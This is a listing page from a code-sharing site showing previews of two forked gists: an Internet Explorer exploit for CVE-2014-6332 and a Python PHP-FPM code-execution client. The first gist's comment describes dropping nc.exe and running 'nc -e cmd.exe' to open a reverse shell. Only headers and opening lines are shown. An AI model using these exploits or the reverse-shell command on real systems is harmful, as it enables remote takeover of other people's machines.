xkon
/ cve-2014-6332_exploit.html
Created
April 13, 2018 14:42
— forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
xkon
/ fpm.py
Last active
May 30, 2017 04:06
— forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import random | |
| import argparse | |
| import sys | |
| from io import BytesIO | |
| # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client | |
| PY2 = True if sys.version_info.major == 2 else False |